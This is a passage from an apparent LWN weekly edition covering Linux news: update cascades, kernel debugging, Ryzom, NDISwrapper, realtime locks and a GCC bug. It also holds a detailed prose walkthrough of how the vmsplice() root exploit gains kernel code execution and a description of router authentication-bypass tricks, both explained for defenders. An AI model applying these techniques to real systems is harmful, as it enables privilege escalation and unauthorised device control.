friction, and leadership."  The pie chart shown on the previous page
has been replaced by a bar chart.  There
are eight more questions that remain to be charted.

The openSUSE project has been discussing
the creation of a developer blog.  Although other blogs exist they tend to
range off-topic.  This would be specifically a place to talk about
development topics, such as new features in YaST.  Posts would be tagged so
that people who wanted to find more about YaST could find all entries with
that tag.

Ubuntu wants all users to be involved with bug squashing.  Do 5 a day - every day!, says Daniel Holbach.

What you can do? That's up to you, your interests and your abilities.
 - If you're a developer, you can help out reviewing patches and getting
them uploaded.
 - If you want to just confirm new bugs, you can do that.
 - If you have experience with a certain package and want to triage bugs
you can do that and forward them upstream if necessary.
 - If you know your way around Ubuntu quite well, you can help assign
bugs to the right package.


That's not a bad idea, regardless of your distribution of choice.

		Cascading security updates


When following the distributions' security updates on a daily basis, as we
do at LWN, certain days are more work than others.  Two weeks ago we had a
rather full update with no
less than 28 packages updated for Fedora (most of those for both F7 and
F8), along with a handful of updates from other distributions.  It turns
out that the majority of the Fedora updates had a single cause: a set
of serious vulnerabilities in Mozilla Firefox.  


How does a single update to an application ripple so far that more than a
dozen packages have to be rebuilt?  One would think there would be shared
libraries that would get updated, with applications picking up those
changes the next time they are run.  That is, in theory, how things are
supposed to work, but in this case, the underlying libraries have no fixed application
binary interface (ABI).  So, changes to those libraries require any
applications that use them to be rebuilt and retested.


Gecko is the rendering engine used by Mozilla in their products to display
HTML.  Various other packages have started using it as well because of its
speed and standards compliance. Because Mozilla sometimes breaks
the ABI between releases, even minor releases, distributions may be stuck
rebuilding those applications when a new version of the library is
released.  Normally, that only happens when packaging a new version of the
distribution—or when serious security flaws are found. 


Mozilla's solution for this problem is XULRunner which
will provide a stable ABI for applications.  As XULRunner and its companion
libxul become more widely available, the applications that
currently link to the Gecko libraries will presumably switch to avoid these
kinds of problems in the future.  It is highly unlikely that we have seen
the last security problem in the Gecko engine, so reducing the cascade that
results from finding one would be welcome.


Because of problems with the ABI changing in the past, Fedora chooses to
make the applications' library version number exactly track the Mozilla release number.
Some other distributions do not do that, so  unless the ABI does change, they do
not need to update each package that uses the libraries.  This has some
advantages, but could lead to broken applications if an ABI change goes
unnoticed. 


We have also seen similar cascades of updates, most notably from the xpdf PDF viewer.  Unlike
Gecko, there is no library for xpdf, leading multiple applications to
include its source into their own.  When a flaw is found, several different
applications (cups, gpdf, etc.) across all distributions need to
be updated immediately, leading to a similar effect as was seen with the
Gecko vulnerabilities.  Hopefully, over time, the development of the poppler library will mitigate
this problem somewhat.

 There are lots of good reasons to separate code into components where
possible, but security is an important one. Creating and maintaining an ABI
is sometimes difficult, but generally worth the trouble. Imagine the chaos
that could result from a security vulnerability requiring an ABI change in
glibc.  

		An object debugging infrastructure


Thomas Gleixner has discovered that being the maintainer of a core kernel
infrastructure module can bring some special challenges.  Whenever
somebody's kernel oopses in the timer code, for example, Thomas tends to
hear about it.  The only problem is that the timer code is almost never
where the bug is.  Instead, it's far more likely that some other kernel
subsystem has corrupted an active timer, leaving a bomb that will only
explode later, in the timer code, when that timer is set to expire.  At
that point, it can be hard to figure out where the real problem is, as the
culprit will be long gone.


In response, Thomas developed some special-purpose code aimed at finding
the real source of timer-related problems, preferably before it brings down
the kernel.  He has now generalized that code and posted it as the object debugging infrastructure
patch, which was subsequently significantly revised.  As this
code develops, it has the potential to help find whole classes of
especially difficult bugs before they bring the system down.  

There's a few steps involved in adding support for object debugging to a
new subsystem.  The first is to create and populate a
debug_obj_descr structure (defined in
&lt;linux/debugobjects.h&gt;):


The name field is the name of the subsystem; it is used in
debugging output.  We will return to the other fields below.

The next step is to call into the object debugging code whenever an action
of interest involves one of the tracked objects.  There is a set of
functions used for this purpose:


In each case, addr is a pointer to the object being operated on,
and descr is a pointer to the debug_obj_descr structure
mentioned above.  The meaning of each call is:


 debug_object_init(): the object is being initialized.

 debug_object_activate(): it is being added to a subsystem list.  For 
     timer debugging, this action happens when add_timer() is
     called.

 debug_object_deactivate(): the object is being removed from a subsystem
     list.

 debug_object_destroy(): the object is being destroyed and is
     no longer referenced within the subsystem.  This call is not 
     used in the version 2 patch set.

 debug_object_free(): the object is being freed.


The debugging code maintains a hashed set of lists for tracking objects;
each object is added to the appropriate list when one of the above calls is
made.  As actions are performed on the objects, their state is tracked.  
In this way, the debugging code
is able to test for a number of common mistakes, including deactivating an
object which is not active, reinitializing active objects, or adding
objects twice.


When something goes wrong, a backtrace is sent to the system logs.  Since
this backtrace identifies where the original error is made, it is likely to
be far more useful than the trace associated with the system crash which
will probably come later.  But this infrastructure can also help to make
that crash less likely, in that each subsystem can register a set of "fixup
functions."  These, of course, are all the methods in the
debug_obj_descr structure which we glossed over above.


For example, if a call to debug_object_init() is made with an
object which has already been activated, the debugging infrastructure will
respond with a call to the fixup_init() callback, passing in the
object in question and its current state (ODEBUG_STATE_ACTIVE in
this case).  The callback should return zero if it is able to,
somehow, repair the damage.  Even if things cannot be truly fixed, though,
there is still use for this function; the timer code, for example, will
disable an active timer if the calling code mishandles it.  The kernel will
almost certainly not operate as expected, but, at least, it has a smaller
chance of crashing at some random time in the future.

Most debugging checks are performed in response to calls from within the
subsystem itself.  There is one useful check which cannot be done that way,
though: detecting the freeing of objects which are still under some sort of
subsystem management.  To catch that mistake, Thomas's patch inserts a hook
into functions like kfree() and free_hot_cold_page().
Every time an object is freed, the code checks through the appropriate list
to see if it is still seen as being active in some subsystem.
Freeing an object which is still known to a subsystem is almost always a
bug - one which can be hard to track down later on.

The check on freed memory objects is clearly a useful debugging tool.  It could also have a
nontrivial overhead, though, since it requires searching a list every time
some memory is freed.  So it has its own configuration option and can be
configured out of the kernel, even if the rest of the debugging code is
built in.

At this point, only the timer subsystem is covered by this infrastructure,
but there are plenty of other obvious candidates.  Perhaps at the top of the
list would be kobjects, which are famously susceptible to all kinds
of programming mistakes.  So expect to see the coverage of this code grow
in the near future.

		Ryzom returns?


Toward the end of 2006, a company called Nevrax went out of business.
Nevrax was the operator of an online multiplayer game called Ryzom which
had developed a dedicated (if insufficiently lucrative) following.  A group
of free software developers, former Nevrax employees, and assorted  Ryzom players sensed an
opportunity here: perhaps the source for Ryzom could be obtained from the
failing company and turned into free software.  It seemed like a winning
solution for all sides: Nevrax's creditors could get whatever money could
be raised for the code, Ryzom players would continue to have a game, and
the free software community would get an extensive new code base.  All that
was needed was to convince the relevant bankruptcy court that this was a
good idea.


To that end, the Free Ryzom project raised some €170,000 in pledges -
an impressive amount of money.  The Free Software Foundation offered
$60,000 toward this goal.  But, in court, another suitor (Gameforge) won
out with a plan to keep the game proprietary.  The Free Ryzom folks became
the Virtual Citizenship Association and faded from view; it seemed that
this story was done.


Only it seems it's not done.  In February, the project sent out a news update on
what had been happening over the past year.  It seems that Gameforge
stopped paying its employees in June, 2007, and, by August, was not paying
its creditors.  In October, Gameforge France went back into the bankruptcy
process; then, last February, the Ryzom servers were shut down.  This
particular plan to save Ryzom, it seems, was not as successful as one might
have liked.


So it seems that the Ryzom source might, once again, be up for grabs.  A news update
suggests that the process is moving quickly, but the project could make a
try for the code if it is able to come up with a large (at least
€230,000) bid in the immediate future.  As of this writing, the Free
Ryzom folks are examining their options and trying to come to a decision on
the best course to take.


There can be no doubt that this code would be a valuable acquisition.
Despite the fact that some of the very first multiplayer online games were
free software (consider Netrek, for example, which occupied rather too much
of your editor's time some 15 years ago, or some of the early MUD and MOO
systems), free software does not have much to offer in that area now.  The
lack of competitive offerings in this area is one of the biggest
motivations for people to use Windows.  A free Ryzom could be a strong step
toward better online gaming with free software.


[PULL QUOTE: 
One has to wonder why we
seem to be unable to put together a competitive game without relying on a
huge infusion of source from the proprietary world.
 END QUOTE]


That said, one has to wonder why we, the larger free software community,
seem to be unable to put together a competitive game without relying on a
huge infusion of source from the proprietary world.  There are certainly
projects out there; consider Battle for
Wesnoth or WorldForge, for
example.  Wesnoth is an addictive game with basic multiplayer capability
and an active developer community, but it is a turn-by-turn game with
relatively rudimentary graphics - though the graphics and soundtracks are
quite nice by free software standards.  WorldForge has high ambitions and a
lot of infrastructure, but it never really seems to get out of that
pre-alpha state.  A look at WorldForge's CVS
logs suggests that very few developers are actively contributing to the
project.


There are critics of the free software community who would argue that
gaming is the sort of program that free software just cannot do as well as
proprietary software.  A certain amount of planning and direction is
required to pull together a coherent virtual world, quite a bit of artistic
work (artwork, sounds, etc) is required, and so on; a project without a
business-based revenue stream just cannot compete in this area.  There
might be some truth to this claim - but not that much.  When one looks all
all that we have accomplished, it does not seem like an online multiplayer
game - challenging though it might be - should be
beyond our capabilities.


What seems more likely is that we just haven't gotten the project
management right yet.  Anybody who has hung around with people who are
interested in computing knows that game playing is certainly an itch that
many feel the need to scratch.  We just haven't yet made it easy enough for
that scratching to happen.


What's needed is a relatively simple core upon which people
can easily create virtual worlds.  It should be straightforward for people
who are not developers - artists, musicians, script writers - to contribute
to the system, and their contributions should be made welcome.  The desktop
projects have had a certain amount of success in bringing in non-developer
contributors; a look at how they have done that could be worthwhile.


Arguably, we should have most of the pieces we need.  Battle for
Wesnoth has shown that it's possible to put together a community which goes
beyond just software developers.  WorldForge seems to have a good start on
some important pieces of infrastructure.  There may be some useful code to
be had from the Second Life client, which has been free for a year now.  We
are a large and talented community, we certainly have the ability to do
something interesting in this area.  It should not be necessary to wait
until we get a code dump from a dead proprietary software company.

		The rest of the vmsplice() exploit story


Back in February, LWN published a
discussion of the vmsplice() exploit which showed how the
failure to check permissions for a read operation led to a buffer overflow
within the kernel.  Subsequently, a linux-kernel reader pointed out that the article
stopped short of a complete explanation: this is not an ordinary buffer
overflow exploit.  Travel schedules and such prevented the writing of an
immediate followup, but your editor would still like to tell the full
story.  So this article picks up where the last one left off and describes
how the vmsplice() exploit makes use of this buffer overflow to
take over the system.

When vmsplice() is being used to feed data from memory into a
pipe, the function charged with making it all happen is
vmsplice_to_pipe(), found in fs/splice.c.  It declares a
couple of arrays of interest:


PIPE_BUFFERS, remember, is 16 on exploitable configurations.  Both
of these arrays are passed into get_iovec_page_array(), which, as
described in the previous article, makes a call to
get_user_pages() to fill in the pages array.  As a result
of the failure to check whether the calling application is allowed to read
the requested region of memory, get_user_pages() will overflow the
pages array, writing far more than PIPE_BUFFERS pointers
into it.  These are, however, pointers to legitimate kernel data
structures; it remains to be seen how this overflow enables the attacker to
take control of the system.

The partial array is also passed into
get_iovec_page_array(); it describes the portion of each page which
should be written into the pipe.  To that end, a loop like this is run
immediately after returning from get_user_pages():


Since full pages are being written in this case, the calculated offset will be zero, and the length
will be PAGE_SIZE (4096).  The value of error is the
return value from get_user_pages(); that will be the number of
pages actually mapped: 46, in the case of the exploit.  Remember that the
partial array is also dimensioned to hold 16 entries, so this loop
will overflow that array as well.

Both of these arrays are declared, one right after the other, in
vmsplice_to_page().  A quick test by your editor suggests that the
partial array will be placed below pages in memory, so,
once partial is overflowed, the loop will start overwriting
pages instead.  So the pages array will end up containing
alternating values of zero and 4096 rather than the real struct
page pointers it had before.  (It's worth noting that the exploit
still works if the arrays are placed in the opposite order, since the
overflow causes code down the line to think that pages is larger
than it really is).

Once all this has happened, control returns to vmsplice_to_pipe()
- the overflow is not big enough to have overwritten the return address.  A
call to splice_to_pipe() is supposed to finish the job, but
something interesting happens there.  Toward the beginning of this
function, this test is made:


Looking back at the exploit
code, we see that it closes the read side of the pipe before calling
vmsplice().  So splice_to_pipe() will quit almost
immediately.  On its way out, however, it does this:


The call to get_user_pages() will have locked each of the relevant
pages into memory to allow the kernel to work with them; this is the
cleanup code which goes back and unlocks the pages which will not be used.
But remember that the pointers in the pages array have been
overwritten, and are now either zero or 4096.  What would normally happen
here is a kernel oops, since those are not legitimate addresses.  The
exploit code has done something tricky, though: using some special
mmap() calls, it has created some anonymous memory at the bottom
of its address space.  


Directly dereferencing user-space addresses while running in kernel mode is
frowned upon for a number of reasons; it can blow up in a number of ways.
But, if the address is valid and the relevant page is resident in memory,
direct access to user-space memory will work.  So, when the kernel starts
to work with the addresses that it thinks are struct page
pointers, it does not get any sort of fault; instead, it gets the data
placed in that memory by the exploit.  Needless to say, that data has been
arranged carefully.


The Linux kernel normally manages each page as an independent object.
There are times, however, when pages are grouped into larger units, called
"compound pages."  This generally happens when physically contiguous
allocations larger than one page are needed by the kernel; when this
happens, a compound page is passed back to the caller.  These pages are
special in that they must be split back apart when they are released back
into the system, and there may be other cleanup work to do.  So
compound pages have an attribute not found on normal pages: a destructor
which is called when the page is freed.

So, if we look at how the exploit sets up its low-memory page
structures, we see:


When the kernel looks for a page structure at user-space address
zero, it will find something which looks like a compound page.  The
destructor (stored in the lru.next field of the second
page structure) is set to kernel_code(), a function
defined within the exploit itself.  Since the count is set to one,
the call to page_cache_release() (which decrements that count)
will conclude that there are no further references and, since the page looks like
a compound page, the destructor will be called.  At this point, the exploit
has arbitrary code running in kernel mode, and the show is truly over.
This code just sets the process's uid to zero (giving it root
access), then engages in some assembly-language trickery to return
immediately to user space, shorting out the rest of the cleanup process. 


There are a couple of interesting implications from all of this.  One, clearly,
is that this exploit is not something which was bashed out by a script
kiddie somewhere.  It was written by somebody who understands low-level
kernel code quite well and who is able to use that understanding to
escalate an apparent information-disclosure vulnerability into a full code
execution problem.  It is, clearly, a mistake to underestimate those who
write exploits, not all of whom immediately make their works known to the
development community.  One also should not  assume that they have not
already written exploits for other, still unfixed bugs.


Also worth noting is the fact that ordinary buffer overflow protection may
well have not been effective against this vulnerability.  The return address on
the stack was not overwritten, and no exploit code was put in data areas.
This episode has caused a renewed interested in technical security measures
in the kernel.  These measures are good, but it would be a mistake to think
that they will fix the problem.  What is really needed is stronger review
of patches with security in mind; it is not yet clear to your editor that
this review is happening.

		The GNOME Foundation launches an accessibility outreach program


The GNOME Foundation has
announced
a new outreach program for the GNOME
accessibility
project:


The GNOME Foundation is running an accessibility outreach program, offering US$50,000 to be split among individuals. This program will promote software accessibility awareness among the GNOME and broader Free Software communities, as well as harden and improve the overall quality of the GNOME accessibility offering.
The program is sponsored by GNOME Foundation, Mozilla Foundation, Google's Open Source Program Office, Canonical, and Novell. 


Applications were opened for review starting on March 1,
the project closes on December 31.  Acceptance of long-term tasks
closes on October 1, short-term task acceptance closes on December 15.
The goal of the program is to work on improving shortcomings in the
existing GNOME accessibility system.
There is an aim to increase awareness of accessibility-related issues,
encourage developers to work on accessibility issues and
generally improve accessibility in free software.


From the project announcement:
"There will be two tracks to the program: In the first track accepted individuals will work towards accomplishing one of the major projects nominated for the program, earning US$6,000 and can take up to six months to complete the task. The second track will reward contributors US$1,000 for fixing five bugs out of a pool of accessibility bugs nominated by the program judges."

<!-- LWNPutAdHere -->

The

program rules explain the contract that the developers will
work under, the process of claiming tasks, the judging process
and more.
A 
list of tasks has been
announced:
"Are you a developer who wants to become more familiar with accessibility? Are you an artist that can draw? Maybe you might also be interested in becoming a module maintainer some day. A great way to get started is by fixing bugs, and we're offering you a way to get paid to do it. :-)"


The list of long-term tasks includes:

Writing and updating accessibility documentation.
Improving accessibility support in the Evince document viewer.
Adding and improving GNOME magnification support.
Building an accessibility testing framework.
Adding new participant-defined accessibility projects.


Developers who need some income and are willing to improve
availability of GNOME to all should consider taking on a task.


		NDISwrapper dodges another bullet


Hardware compatibility has long been a problem for Linux—though it has
gotten much better over the years—so it will be surprising to some to
see a kernel change that will make some hardware cease working.  For
others, who follow kernel development a bit more closely, it will come as
no great surprise that NDISwrapper was
disabled by a change made to the kernel back in January.  NDISwrapper has
never been very popular with kernel hackers, but, because it is GPL
licensed and allows more hardware to be used, there are folks on both sides
of the argument.  For a while, it looked like NDISwrapper had lost that
argument, but the 2.6.25-rc4 release restores the functionality it requires.


NDISwrapper is a kernel module that is used to load Windows-only drivers
into Linux.  For some hardware, notably wireless network cards, it is the
only way to support them because the manufacturer provides neither
specifications nor a working Linux driver.  Unfortunately, many of these
cards are installed in laptops where it is difficult or impossible to
replace them with Linux-friendly alternatives.  This is what led to
implementing the Network Device Interface Specification
(NDIS) for Linux. NDIS is an ancient—it was originally developed by
Microsoft and 3Com for MS-DOS in
the mid to late 1980s—interface for networking devices, which is
still in use today.


The NDISwrapper code has been around since 2003, but always as a separate
module that must be built by the user (or distribution) and loaded into the
kernel.  It is not part of the mainline kernel, nor will it ever be;
maintaining a glue layer that allows proprietary, closed-source drivers to
be linked into the kernel is not high on anyone's list.  But, NDISwrapper
is GPL.  Its code is available for inspection or modification by
all, so that is not the problem, it is the intent that matters.


When a binary-only driver—the NVidia video driver for example—is loaded into the kernel, a "taint" flag is set,
indicating that the kernel is tainted by code that cannot be examined.  Bug
reports for tainted kernels are routinely ignored, unless they can be
reproduced in an untainted kernel.  Life, it seems, is too short to try and
diagnose problems that could easily have been created by a buggy driver
that cannot be debugged.  Originally, the taint flag was just a means to
detect and ignore those bug reports, but over time it has become part of a
mechanism to restrict which symbols a module can access.


Some kernel symbols are considered so integral that any module using them
must be a derivative work.  Therefore, modules that want to use them must
be GPL. Modules declare their license using the MODULE_LICENSE
macro, while symbols are exported using either EXPORT_SYMBOL or
EXPORT_SYMBOL_GPL.   Any module that doesn't have a compatible
license doesn't get access to the GPL-only symbols. 


Few would argue for a GPL module which existed to re-export all of the
GPL-only symbols to non-GPL modules. But that is not what NDISwrapper does;
instead it implements NDIS, but in order to do that, needs access to
GPL-only symbols, mostly for USB and workqueue interfaces.  It would be
hard to contend that NDIS drivers are derivative of the Linux kernel, they
were written for an entirely different system using an interface that predates Linux.  This is why NDISwrapper developers
and users think that an exception should be made for it.  Clearly the
Windows drivers taint the kernel, but accessing a subset of the GPL-only
functionality through NDISwrapper should be allowed, they argue.

 Since NDISwrapper itself is GPL, the normal module loading rules would
allow it to access GPL-only symbols, except that an explicit check for
NDISwrapper was added to the 2.6.16 kernel.  The question, then, revolves
around what should be done when the kernel detects it being loaded.
NDISwrapper has always been careful to mark the drivers that it loads as
tainted, but the recent patch marks the module itself as tainted,
disallowing access to the GPL-only symbols and breaking NDISwrapper. Absent
that patch, only the kernel is marked as tainted—the module itself is
not.  

A similar situation occurred back in October 2006, which LWN covered on the Kernel page, when
a stricter interpretation of tainting started to be enforced.  At that
point, NDISwrapper stopped working and it looked like it might stay that
way, until Andrew Morton stepped in with objections to breaking NDISwrapper with no warning.  Shortly
thereafter, a patch was merged that only marked the kernel as tainted when
NDISwrapper is loaded.  At
that point, the issue fell by the wayside, until now.


Part of the problem is that marking a symbol as GPL-only means different
things to different developers.  For some, it is a means to warn
proprietary driver developers that they are straying into territory that
makes distribution of their drivers very likely to be a violation of the GPL, while others
want to use it to completely eliminate binary-only kernel drivers.  There
is no policy that clearly delineates which interpretation is "correct".  Meanwhile,
NDISwrapper has been in use by many for four years or more; breaking it
now, with little or no warning, is likely to create some very unhappy users.


Linus Torvalds clearly thinks there are no licensing issues with NDISwrapper:

Quite frankly, my position on this has always been that the GPLv2 
explicitly covers _derived_ works only, and that very obviously a Windows 
driver isn't a derived work of the kernel. So as far as I'm concerned, 
ndiswrapper may be distasteful from a technical and support angle, but not 
against the license.


Jon Masters, the author of the patch that
inadvertently made this change, had an excellent suggestion that should
be pursued to try and reduce these kinds of problems in the future:

Since we've brought it up, one good thing I would like to see come of
this perhaps is a clearer understanding of what the kernel should and
should not be doing in terms of "license compliance enforcement". We
have had lots of talk, but perhaps a "policy" document is worthwhile.


Another interesting battle will be that surrounding exporting
init_mm() which was removed in early versions of 2.6.25, but
then restored in 2.6.25-rc4.  It is fairly clearly a low-level kernel
interface that is unused by any in-tree driver, so its export was removed.
One rather glaring exception is that the out-of-tree NVidia binary drivers do
use it.  Its export has been restored for one more development cycle, but it is clearly seen as
something that should not be touched by drivers.  It could be quite a
struggle between the developers and users of a very popular driver and the kernel hackers
that don't want to see kernel API abuse.  


Issues surrounding the GPL are always contentious on linux-kernel; this one
is no different.  While NDISwrapper is an out-of-tree driver, it has hardly
been invisible, so complaints when it breaks should come as no surprise.
A simple renaming will avoid the current kernel check, so breaking it that
way will mostly be
an annoyance to users rather than a real barrier to its use.  Since there
is no real consensus amongst kernel hackers on the binary driver issue, it is hard to see one
emerging with regards to NDISwrapper, but that would be the best outcome.
One way or another, it needs to be decided, NDISwrapper shouldn't come
under a periodic threat of breaking.  If it is determined to be a violation
of the kernel interfaces, that should be clearly indicated and its users should be given some
warning so they can find alternatives.


		File monitoring with Mortadelo and SystemTap


SystemTap is a tool to help gather information about running Linux systems
which has been available for some time now.  But applications that use the tool
have been few and far between.  Mortadelo is a
GUI tool that uses SystemTap to observe and record system calls.  It is
more of a proof-of-concept than a complete application—though it is
useful in its current form—but it does start
to show some of the things that can be done using SystemTap.


Mortadelo specifically intercepts system calls that deal with accessing
files, collecting the arguments to the calls as well the return codes.  It
is patterned after the Windows Filemon program, which is used in much the
same way that a Linux user might use strace—only with a GUI.
Problems with permissions or files that do not exist are the kinds of
things that Mortadelo could be used to diagnose.


The data collected is displayed in a list in the GUI (shown at left),
which can then be filtered using regular expressions to pull out the
information of interest.  Because it uses SystemTap, Mortadelo gathers
information from all running processes at once, allowing the user to choose
which parts they are interested in.  The filtering is
somewhat primitive, in that particular fields cannot be chosen to filter
on, but still useful because it searches each entry fully.  


System calls that return an error are highlighted in red making it easy to
pick them out.  By choosing appropriate strings to filter on, all
permission errors in the system or every access of a particular filename
can be seen.  The GUI allows one to start and stop the recording as well as
to save the captured data to a file.  Each entry includes a timestamp,
the process name and pid, the system call, return code, and arguments.


The application is written in C#, using the Mono framework; one of the authors
has an interesting weblog entry comparing Mono
and Python for developing this kind of tool.  Mortadelo's interface to
SystemTap is fairly straightforward, it spawns a stap command and
sends it the probe points and code via stdin.  It then reads the
stap output, parsing it and displaying it in the window.


There were some tricks to getting it to build and run, but Eugene Teo's instructions
for running it on Fedora 8 were quite helpful.  Part of the
problem was in getting SystemTap going on the system, which is a problem we have mentioned
before.  There were some other small hurdles as well, but Teo's hints
and proper application of grep were enough to get past those. 


Mortadelo's impact isn't so much in the application itself as it is in some
of the ideas behind it.  Using SystemTap for GUI tools will help users and
administrators, especially those who are not command-line
savvy.  If Mortadelo, or some descendant of it, becomes popular, that will
help make SystemTap use more widespread.  Distributors will start packaging
it in more readily usable forms, perhaps installing it by default.  That
will in turn help anyone tasked with keeping a Linux system smoothly
functioning, whether they are GUI-centric or not.


		Realtime adaptive locks


The realtime patchset has one overriding goal: provide deterministic
response times in all situations.  To that end, much work has been done to
eliminate places in the kernel which can be the source of excessive
latencies; quite a bit of that work has been merged into the mainline over
the last two years or so.  One of the biggest remaining out-of-tree
components is the sleeping spinlock code.  Sleeping spinlocks have
advantages and disadvantages.  A recently posted set of patches has the
potential to significantly reduce one of the biggest disadvantages of the
realtime spinlock code.


Mainline spinlocks work by repeatedly polling a lock variable until it
becomes available.  This busy-waiting code thus "spins" while waiting for a
lock.  Spinlocks are quite fast, but they can also be a source of
significant latencies: a processor which is holding a lock can delay others
for indefinite amounts of time.  In the mainline kernel, it is also not
possible to preempt a thread which holds a spinlock - another source of
latencies.  (See this article
for a more detailed description of the mainline spinlock implementation).


The realtime patch set addresses this problem in a couple of ways.  One of
those is to cause threads waiting for a contended lock to sleep rather than
spin.  As a result, lock contention cannot create latencies on processors
which are not holding the lock.  When spinning is removed, it is also
possible to make code preemptible even when it holds a lock without causing
deadlock problems.  That allows a high-priority process to run regardless
of any lower-priority processes which might currently hold locks on the
current CPU.  Finally, the realtime patch set has added priority awareness
and priority inheritance to the locking code to ensure that the
highest-priority process is always able to run.


This is all good stuff, but there is one little disadvantage: the extra
overhead imposed by the more complicated locks can reduce system throughput
considerably.  This is a cost that the realtime developers have been
willing to pay; it is often necessary to make trade-offs between throughput
and latency.  Recently, though, some developers at Novell have come to the
conclusion that the throughput cost of the realtime patch set need not be
as severe as it currently is; the resulting adaptive realtime locks patch
brings the throughput of the realtime kernel to a level much closer to that
found in the mainline - at least, for some workloads.


The core observation encapsulated in this patch set is that hold times for
spinlocks tend to be quite short, especially in the realtime kernel.  So
the cost of putting a waiting thread to sleep may well exceed the cost of
simply busy-waiting until the lock becomes free.  So adaptive locks behave
more like their mainline counterpart and simply spin until the lock becomes
available.  There are some twists, though, which are necessitated by the
realtime system:


 The spinning cannot go on forever, since it may cause unacceptable 
     latencies elsewhere in the system.  So an adaptive lock will only spin
     up to a configurable number of times (the default is 10,000) before
     giving up and going to sleep.

 Since lock holders are preemptible in the realtime kernel, it is
     possible that the thread which currently holds the lock was previously
     running on the same CPU as the process trying to acquire the lock.  In
     that situation, spinning for the lock is 
     clearly a bad thing to do.  In the absence of a loop counter, it would
     be a hard deadlock situation; with the counter, it would just be an
     unnecessary delay.  Either way, the result is undesirable, so, if the
     lock owner is running on the same 
     processor, the thread waiting for the lock simply goes to sleep.

 If the lock owner is, instead, itself sleeping while waiting for something,
     there is little point in having another thread stay awake in the hope
     that the owner will release the lock soon.  So, in this case too, a thread
     contending for a lock will simply go to sleep rather than spin.


One other throughput improvement is obtained by changing the lock-stealing
code.  Locks in the realtime system are normally fair, in that threads
waiting for a lock will get it in first-come-first-served order.  A
higher-priority process will jump the queue, however, and "steal" the lock
from lower-priority processes which have been waiting for longer.  The
adaptive locks patch tweaks this algorithm by allowing a running process to
steal a lock from another, equal-priority process which is sleeping.  This
change adds some unfairness to the locking code, but it allows the system
to avoid a context switch and keep a running, cache-warm process going.

Some
benchmark results [PDF] have been posted.  On the test system, the
dbench benchmark runs at about 1500 MB/s on a stock 2.6.24 system, but
at just under 170 MB/s on a system with the realtime patches applied.
The adaptive lock patch raises that number back to over 700 MB/s -
still far from a mainline system, but much better than before.  The
improvement in hackbench results is even better, while the change in the
all-important "build the kernel" benchmark is small (but still positive).
A fundamental patch like this will require quite a bit of review and
testing before it might be accepted.  But the initial results suggest that
adaptive locks might be a big win for the realtime patch set.

		A draft proposal for Fedora spins


This week Jeff Spaleta posted a draft
proposal for a spin submission and approval process.  For those
interested in creating officially approved Fedora spins, it is worth a
look.

Anyone can create a Fedora spin for their personal use.  Just create a
kickstart file to install the packages you want.  There are various ways of
doing this, but the Anaconda
kickstart is probably the most common.  This kickstart file tells the
Anaconda installer what packages you want, and you have your own Fedora
spin.

This draft is about creating official spins that will be listed at the Fedora Project Spins Tracker,
and available for interested users to get the official Fedora spin of their
choice.  However there does need to be a way to cleanly distinguish between
Released Spins and Contributed Spins.

What will it take to create an official Fedora spin according to this
proposal?  The first step is get a kickstart file into the Kickstart Pool,
where the file will be reviewed and tested by a peer group of Spin
Maintainers.  If the peer group approves then the spin proposal goes to the
board for review.  If the Fedora Board approves the spin it will be granted
trademark usage and from there it can be added to the Fedora CVS.

A number of steps need to be completed for this plan to work.  First is the
creation of Spin Guidelines.  The guidelines will specify a minimum level
of technical quality for kickstart files, and contain a naming scheme for
new spins.  The not-yet-formed peer group of Spin Maintainers will have
some say in these Guidelines, although the release engineering team will
probably create the first draft.

There is a long way to go to get a straightforward way for a Fedora Special
Interest Group (or anyone else) to get a spin approved, but such things
always have a start somewhere.

		Authentication bypass in routers


An authentication bypass vulnerability is one of the more dangerous problems
that a web application can have.  It allows the attacker to perform some
action that the application designer saw fit to restrict to authenticated
users without providing said authentication.  Using these
techniques, an attacker can control a targeted web application from afar without
even wasting time cracking bad passwords—a dream
scenario for such people.


If an authentication bypass is found in the latest social networking site, the flaw could cause
embarrassment, but if that bypass is in your home router, much worse things
could result.  A series of articles over at GNUCITIZEN highlights quite a
variety of authentication bypass flaws in various embedded devices
including routers.  The flaws come from
their research and recent router
hacking challenge, which challenged readers to find holes in
their routers.  (There is no table of contents for the series, so here are links to
the four installments: 1,
 2,
 3,
 and 4).


Most authentication bypass flaws are caused by a conceptual mistake made by
web programmers: believing that the "normal" way of accessing the site is
the only way to access it.  This manifests itself as applications that
check for particular URLs to see if they require credentials without
considering the possibility of aliasing.  For example, web servers will
generally ignore double-slashes in a URL, but if the application checks for
/privileged/page and gets /privileged//page it may very
well fall prey to an authentication bypass.  Other similar schemes can be
used to make the URL look different, but arrive at the same place.


A far uglier possibility is applications that believe you can only get to a
particular URL via a page that enforces authentication.  This is a belief
in "security through obscurity"; that attackers won't be able to guess the
URLs for the pages "behind" the authentication screen.  This is almost
comical in that there are many ways to find out what those URLs are,
not least by buying the device and accessing them yourself.  Pages that
require authentication need to check that the credentials have been
provided whenever the page is accessed—without regard for what
URL got them there.


Some applications do all of the checking correctly on the pages that show
various settings in a form allowing them to be changed, but the action of
the form submits it to a different program.  Inexplicably, sometimes that
program does not check for credentials.  Perhaps the programmer believes
that web forms can only be submitted from the page that they have created, but it is
trivially easy to generate an HTTP POST with the appropriate parameters.
It certainly does no good to protect the current value of settings from
non-authenticated users if they can easily change them to any values they
want. 


In terms of web security, authentication bypass is usually quite easy to
avoid, it is a matter of ensuring valid credentials anywhere they are
required.  Before performing any action that requires a logged-in user,
check the cookie (or other persistent authentication mechanism) for
validity to perform the action requested.  For people using routers at
home, perhaps the best advice is to make sure its administrative
interface is not internet facing.  Routers have a pretty bad track record
of getting this right, so far, as the hacking challenge and other research
has shown.


		GCC 4.3.0 exposes a kernel bug


A change to GCC for a recent release coupled with a kernel bug has created
a messy situation, with possible security implications.  GCC changed some
assumptions about x86 processor flags, in accordance with the ABI standard,
that can lead to memory corruption for programs built with GCC 4.3.0.  No
one has come up with a way to exploit the flaw, at least yet, but it
clearly is a problem that needs to be addressed.  


The problem revolves around the x86 direction flag (DF), which governs
whether block memory operations operate forward through memory or
backwards.  The main use for the flag is to support overlapping memory
copies, where working backwards through memory may be required so that the data
being copied does not get overwritten as the copy progresses.  Debian
hacker Aurélien Jarno reported the problem to
linux-kernel on March 5th, which was found when building Steel Bank
Common Lisp (SBCL) using the new compiler.


GCC's most recent
release, 4.3.0, assumes that the direction flag has been cleared
(i.e. memory operations go in a forward direction) at the entry of each
function, as is specified by the ABI (which is, somewhat amusingly, found at
